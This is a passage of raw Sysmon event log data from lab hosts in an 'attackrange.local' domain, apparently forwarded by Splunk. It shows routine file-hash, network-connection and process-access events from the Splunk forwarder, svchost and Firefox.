Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D72D47916ED3827AF907F5F7EA277AE,SHA256=96530854700E8FF12CE8A4166CC59F70CCF605FFF831B015F73BF44676EE22C2,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053086Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:28.733{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61903-false10.0.1.12-8000- 23542300x80000000000000001053085Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:37.482{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEE5E68F13CE1445E613A0D9A4EDDB0A,SHA256=0F1D869727047C738840B2E172C3BB5B1D518AAC8FC2B5403BC20B40E7AA39BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809657Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:38.963{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6FEF5DB20B3DECB76F2B0D1FEF55032F,SHA256=65A79E2C4B944C2C6DD0A1E8D4B3757E721F54FB7AD53E0CC025EEA3C73695DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053088Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:38.633{466BC892-02AF-60E8-1200-00000000CF01}400NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=660189D7D9315AEDF23D4AEDD6D312C9,SHA256=DCE690DB71A47F83220E3C198FC9D82FF3475C1F59CC1AA1D29701F66AC48C3A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053087Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:38.502{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF6764E837DF8BE779ADA9CE751F5B3E,SHA256=5E898912DA90A19542BCEBB9EAE8071012EADB6D6C93AE64A0F663C8FC7553D0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809658Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:39.979{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=11D439DF53E4D36E16BDB960820BBDD0,SHA256=765B3277A0B03A184194A7E50E1280C33CB2CDECE0F547E9CD3303536F7B5C92,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053089Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:39.517{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85CA447E0663647B98FC524BC9FF2AE7,SHA256=485619CF03E209172EAC7058940C8B744D51525A3A6EA25E4B327EFC9FF5C557,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053101Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:40.886{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=EAEF22D0AC09A24B87A02B1ACF2EDC47,SHA256=D8869C64BB10AC1EB7951DC010F19BA6EF862413B2BA4EDF9D6550EADB33D4E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053100Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:40.865{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=DF575C60D04FE071FEA718616158DAC5,SHA256=06598E180AE0FDD72EC4D3800415AE3D9E43DF20FEF97CBC62106CAB297D686F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053099Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:40.865{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=67E470882D34E342DDA051C92BC6221D,SHA256=9CCBF03FBDB9691DE445D84C288298B736B0C22FFE11A7195EB4D138AB2C4B60,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053098Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:40.865{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=1C4F879DB0FA9F76EEFF2A6C3C8A5574,SHA256=B29743C2793451FBE712E291345594656B9D1E3966821EB92B05CE04153ACCA0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053097Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:40.865{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=6BE9E9DD170CF8B36A0AD45CDC6615BA,SHA256=76ADB337A1B633FAAADD069C0D57648D24F3C747C634E47DF053250F35B28A97,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053096Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:40.865{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=1C4FE2AC90A3B2E7128E30CBDE6F1BEA,SHA256=EFBE0DC73FC4BE8A25878372836536246BCA4D887E4548B6E8E0E6EC9AA6C2CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053095Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:40.865{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=A9715BE816A71A92AD7A04172D20C17B,SHA256=5B5CC79AE6D5CB54D8B1171A8D8DC98360B4AD0F5B8E4F8F22D44EFEA9CCCF93,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053094Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:40.865{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=A935D7AD3446F5C43700FE3357F768FE,SHA256=BF379992EA6539C5CCCEA1167A337F1A6E4A85E77497A2B82B616E3843EE0A29,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053093Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:40.865{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=3C232A292A27CEC34B15E21141520ED3,SHA256=7DDA69CC91D8C4CD99B3209CFBE26C6DBA992FAFAAC567F089BC4BA46DB13233,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053092Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:40.865{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=4046E3C1E001C64406FE81F5F68D32A6,SHA256=D01F8ACAE9D9A8939CEF7C21404F82E2AA54DEDCAAF93784D356520763C29F25,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053091Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:40.865{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=6E77792229C90CBCCA5A7159C79C5E41,SHA256=82F6189E93CD0DED1F3E90DFD7D26C27C7BABB937B69BE309D7AAA41A7ED72C1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053090Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:40.518{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DAD459B95E8A276A901AE17AE8D6C4AF,SHA256=64B1606C865D0588D6BD5AC5CA23EAA21D0C446E2B69BE33B29C6702E547DB7A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809659Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:39.330{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57410-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001053105Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:41.533{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE55A9682FD36D828717D37112E98581,SHA256=FDA8AFA6FF08236DD7A79230A561B58BB5374434FE7412DDFE7F3FED28065AEB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809660Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:41.025{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6398434113D0402D253206E5DB19754,SHA256=0E1A1AE41591BC113FD58523A4153614D5AACE9700193AF92E3E4A54E28C9313,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053104Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:41.486{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1500-00000000CF01}1260C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053103Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:41.482{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1500-00000000CF01}1260C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053102Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:41.482{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1500-00000000CF01}1260C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001053107Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:42.547{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5E473AF07E8E531A0D4E7E0E9E8F710,SHA256=D7D70A52C62EC52C8B1C60726DC11EAFC7207F7195C200F387B6A47576438547,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809661Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:42.041{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA9150D09F40C1C9A84AB315FA2225F0,SHA256=9149604908A82288E40D92B20F104810DC119C88DBEF1EEF691FF8E03E396E79,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053106Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:34.664{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61904-false10.0.1.12-8000- 23542300x80000000000000001053108Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:43.563{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3874839FA646885CBA96BE1E6DB5F6F0,SHA256=0D52F69F7419A68718E594DD58348F469D29FCA7A8A962A7923FE4EE95A526A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809662Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:43.072{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBEB222600D252CB05D671453543B35E,SHA256=219CB6EC40E5B3E4F7CC35E47AF786AA1590A6B0591C654776A4FCF404EDBFCB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053109Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:44.581{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF4116EA53B2FDF3FF59D300DE15042C,SHA256=7D10C28B8593D1B6E90E115C9E3664EA0F003F30810B839EE8D471F0A933CEF0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809663Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:44.088{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBAB453F8E826E8DD30DFEE6A1A4ECCA,SHA256=CF9B457A47C2A9BE4BE6B33CDAE00B8AFDEF2450C300BA8B430F8B42478622A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053110Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:45.599{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0DDFF848134B81CD90D1E1275CE3B8BF,SHA256=D13F08534ABF5FAAD4575FE59557F22F29D5B07964670040F53E4B374D626895,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809664Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:45.088{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=14AA484C9D7B853032A8F987171437B7,SHA256=A7BF2F08E162B13C4AE37DB963C154D99324F7F93139AC955D03E5D0939B06B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053111Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:46.630{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16F8514531DA63107324E6D13093F400,SHA256=4AD66801065064FD32A5FBC2A0D2D0FB2532288631C35DB9B72A7577C962A9FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809665Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:46.166{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A83A3B3F489C402B48A340858F276C29,SHA256=C262C17198740AA7A73D7A5871460AB96E1604DE12B0B5E00B8042321708DD92,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053112Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:47.661{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A51FE7C55AC304DCB98952254CEF0E9,SHA256=54BDA52A5FB332CECBA7F77540A4996E014508E3CF86DCDA22DB2F37FDEFFF62,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809667Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:47.213{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E84D51649DA299F1E7A362EF8BF411E6,SHA256=BC0BD47947AD2C68926172805436D611EB0F9693E77C198F595DD63D642C2466,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809666Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:45.314{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57411-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001053114Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:48.678{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89D6AC89019E739FBE46E9C816F6ABB7,SHA256=A8BCD926EAB0695B954BC24F1502BABBF920C5D93AFF5FEF7A54D7D3757F78CB,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053113Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:40.692{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61905-false10.0.1.12-8000- 23542300x8000000000000000809668Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:48.244{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0EAC769DA5A0BC7AC26C4863B7945ECD,SHA256=9666A96FD1DE42B496EA80D503F434B1B1230AE6C8CC95BA68A04FD0A1C12F73,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053115Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:49.680{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C189097A88C8B5C094C5A2567001437,SHA256=222E413904F51C760372E1CFCC7364EFF919A574B268528E6DF2BF386A95EB4A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809669Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:49.244{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67DE3C13A090AD66554DED70DFAA7EDE,SHA256=3A39BD8A534A1421017FCC793703C13A93CEF3692810E0D18DAA30DD1BDE0BB9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053134Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:50.744{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F766-60EB-C47D-00000000CF01}3804C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053133Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:50.744{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053132Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 